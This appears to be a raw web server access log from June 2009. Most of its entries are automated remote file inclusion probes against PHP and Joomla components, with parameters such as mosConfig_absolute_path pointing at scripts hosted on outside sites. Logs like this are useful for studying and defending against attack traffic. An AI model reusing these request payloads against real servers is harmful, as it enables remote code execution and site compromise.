65.23.158.226 - - [19/Jun/2009:03:27:44 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.23.158.226 - - [19/Jun/2009:03:27:44 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.120.237.150 - - [19/Jun/2009:03:27:50 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
200.105.207.244 - - [19/Jun/2009:03:27:58 -0400] "GET /logs/access_log.Q109052900%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:03:28:01 -0400] "GET /images/menu_dot.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
94.23.200.54 - - [19/Jun/2009:03:28:07 -0400] "GET /logs/access_log.Q109053100%20%20//zb41/include/write.php?dir=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.234.21.178 - - [19/Jun/2009:03:28:17 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.234.21.178 - - [19/Jun/2009:03:28:17 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.234.21.178 - - [19/Jun/2009:03:28:17 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.234.21.178 - - [19/Jun/2009:03:28:26 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.23.158.226 - - [19/Jun/2009:03:28:29 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.6.17.151 - - [19/Jun/2009:03:28:59 -0400] "GET /images/ACE_Orderform.pdf HTTP/1.0" 200 31826 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.200.54 - - [19/Jun/2009:03:29:05 -0400] "GET /logs/access_log.Q109052400%20%20//zb41/include/write.php?dir=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:29:07 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:29:07 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:29:09 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
213.33.143.3 - - [19/Jun/2009:03:29:13 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
211.49.99.7 - - [19/Jun/2009:03:29:27 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:29:27 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:29:32 -0400] "GET /logs/error_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:29:38 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.23.158.226 - - [19/Jun/2009:03:29:51 -0400] "GET /logs/access_log.Q109051900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.43.202.66 - - [19/Jun/2009:03:29:54 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:29:54 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:29:54 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:30:03 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:09 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:09 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:10 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:13 -0400] "GET /logs/access_log.Q109060400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:21 -0400] "GET /logs/access_log.Q109060400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:43 -0400] "GET /phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:43 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:43 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:44 -0400] "GET /phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:44 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:30:44 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:03:30:53 -0400] "GET /logs/access_log.Q109060900%20%20/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.128.135.52 - - [19/Jun/2009:03:31:06 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
218.38.16.107 - - [19/Jun/2009:03:31:48 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:31:57 -0400] "GET /logs/access_log.Q109060900/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:03:32:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.16.107 - - [19/Jun/2009:03:32:05 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:32:40 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:32:40 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:32:40 -0400] "GET /logs/access_log.Q109031800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:32:40 -0400] "GET /logs/access_log.Q109051500%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:32:46 -0400] "GET //include/lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:32:46 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:32:51 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.33.143.3 - - [19/Jun/2009:03:33:11 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
211.49.99.7 - - [19/Jun/2009:03:33:21 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:33:38 -0400] "GET /logs/access_log.Q109050900%20%20//include/lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.120.237.150 - - [19/Jun/2009:03:33:44 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
211.43.202.66 - - [19/Jun/2009:03:34:17 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:34:18 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:34:30 -0400] "GET /logs/access_log.Q109051200//zb41/include/write.php?dir=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:34:33 -0400] "GET /default.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:34:33 -0400] "GET /logs/default.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:34:33 -0400] "GET /logs/access_log.Q109051200/default.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:03:34:33 -0400] "GET /logs/access_log.Q109052400/default.php?page=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
89.186.1.54 - - [19/Jun/2009:03:34:55 -0400] "GET //?phpbb_root_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.186.1.54 - - [19/Jun/2009:03:34:56 -0400] "GET /logs/access_log.Q109053100%20%20//?phpbb_root_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.186.1.54 - - [19/Jun/2009:03:34:56 -0400] "GET /logs//?phpbb_root_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:03:35:28 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.186.1.54 - - [19/Jun/2009:03:35:45 -0400] "GET /logs/access_log.Q109052200%20%20//?phpbb_root_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:03:36:16 -0400] "GET /logs/error_log.Q108062300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.14 - - [19/Jun/2009:03:36:28 -0400] "GET /images/index2_minbldhand.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
67.208.139.72 - - [19/Jun/2009:03:36:32 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:03:36:32 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:03:36:32 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:36:35 -0400] "GET //////?DOCUMENT_ROOT=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:36:35 -0400] "GET /logs/access_log.Q109050800//////?DOCUMENT_ROOT=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:36:35 -0400] "GET /logs//////?DOCUMENT_ROOT=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 200 6117 "-" "Mozilla/5.0"
74.208.16.224 - - [19/Jun/2009:03:36:37 -0400] "GET /logs/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
74.208.16.224 - - [19/Jun/2009:03:36:37 -0400] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.amembersignup.com/signup/smarty.do?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
58.252.80.131 - - [19/Jun/2009:03:36:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
58.252.80.131 - - [19/Jun/2009:03:36:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
58.252.80.131 - - [19/Jun/2009:03:36:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
58.252.80.131 - - [19/Jun/2009:03:36:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon)"
62.128.135.52 - - [19/Jun/2009:03:36:51 -0400] "GET /logs/error_log.Q109041400//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/Jun/2009:03:36:51 -0400] "GET //component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/Jun/2009:03:36:51 -0400] "GET /logs//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
216.117.128.143 - - [19/Jun/2009:03:37:03 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:37:03 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:37:03 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:37:03 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:37:03 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:37:03 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:03:37:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.117.128.143 - - [19/Jun/2009:03:37:22 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:37:23 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:37:23 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.23.158.226 - - [19/Jun/2009:03:37:40 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.23.158.226 - - [19/Jun/2009:03:37:40 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
65.23.158.226 - - [19/Jun/2009:03:37:40 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.49.99.7 - - [19/Jun/2009:03:37:55 -0400] "GET /logs/error_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
65.23.158.226 - - [19/Jun/2009:03:38:05 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.49.99.7 - - [19/Jun/2009:03:38:17 -0400] "GET /logs/error_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:38:31 -0400] "GET /logs/access_log.Q109050800%20%20//////?DOCUMENT_ROOT=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:03:38:33 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:38:35 -0400] "GET /logs/access_log.Q109051300%20%20//////?DOCUMENT_ROOT=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:03:38:38 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:39:15 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:40:02 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.98.59.178 - - [19/Jun/2009:03:40:10 -0400] "GET //include/admin.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
216.117.128.143 - - [19/Jun/2009:03:40:11 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:40:13 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:40:23 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.128.143 - - [19/Jun/2009:03:40:29 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.98.59.178 - - [19/Jun/2009:03:40:41 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
65.98.59.178 - - [19/Jun/2009:03:40:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
